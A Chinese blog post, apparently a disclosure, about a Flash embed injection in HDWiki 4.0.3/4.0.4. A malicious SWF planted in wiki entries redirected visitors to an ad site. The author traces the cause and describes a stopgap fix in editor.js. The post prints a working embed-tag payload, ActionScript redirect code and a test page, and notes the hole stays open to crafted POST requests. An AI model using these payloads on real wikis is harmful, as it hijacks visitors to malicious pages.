西瓜注:从HDWiki很老的版本我就发现了他有很多的跨站漏洞,但是我一直没有对外公布过。只是把自己发现的问题直接邮件给其开发人员。但是现在有人开始直接对外公布了,而且还是在我的友链站点进行了挂恶意代码,看来以后我还是发现问题后就直接对外公布,这样Hdiwiki可能会关注度高一些吧。
From:clin
今天下午在“百科”里发现异常情况:点开一个词条后,刚刚看到内容,就跳转到一个电影网站(要真是个电影网站还好点,可看到的是三个弹出网页,然后 就广告广告,连那个最大的很像播放器的东东也是个广告,人渣啊)啦!郁闷的还以为是浏览器出问题啦,后退后退还是不行,看看链接也没有错啊,怀疑是不是域 名被劫持啦,于是ping,对啊,换个浏览器打开域名首页,正确!
一个念头就是词条内容有问题,HD一直有个问题就是词条名字太长会被错误的截断,导致网页源码乱码(应该是编码字节处理没搞好),只有IE下会是乱码,一个一个点刚才的词条,有一次跳转发生啦,囧。
实施对HDWIKI百科网站的FLASH挂马欺骗(任何一个人点进词条自动跳转到目标网站)
只好把那个网页用迅雷下回来,看源码,没有太大异常,只有一个,发现”embed”半闭合标签,里边的Swf打开后跳转到目标网站,疑团解开啦,找办法修复。
怎样过滤词条添加过程中的SWF文件?发现使用正常的添加媒体按钮添加的SWF文件并没有任何问题(不会跳转)。
使用源码直接添加写好的SWF嵌入代码:
<embed type=”application/x-shockwave-flash” src=”http://clin003.com/sa/1.swf” AllowScriptAccess=”always” />
对HDWIKI编辑器进行修复
跳转,囧,看来从编辑器里把插入SWF时附带的代码修改并不会起作用,对过滤语句的标签中添加“embed”,是不起作用的(HDwiki 4.0.3的编辑器),可能我写的有问题。
于是就取个最捷径的办法,把切换到源码模式的按钮事件所使用的函数语句注释掉!!
文件为“js”目录,“editor”文件夹下的“editor.js”(注释掉函数内容暂时解决)
hdwiki4.03的大概在1681行到1698行
hdwiki4.04的大概在965到973行
隐患
虽然从编辑器功能上进行啦防范,但仍然有可能利用(因为这段代码没有被过滤,可以直接发送制作好的数据包进行POST)
附注:
swf的跳转动作代码很简单
if(1){geturl(”http://clin003.com/”,”_self”);}
只要这样就可以啦,测试页面:http://clin003.com/sa/index.html (建议保存到不同的域名下试试效果)。
本文还暂无回复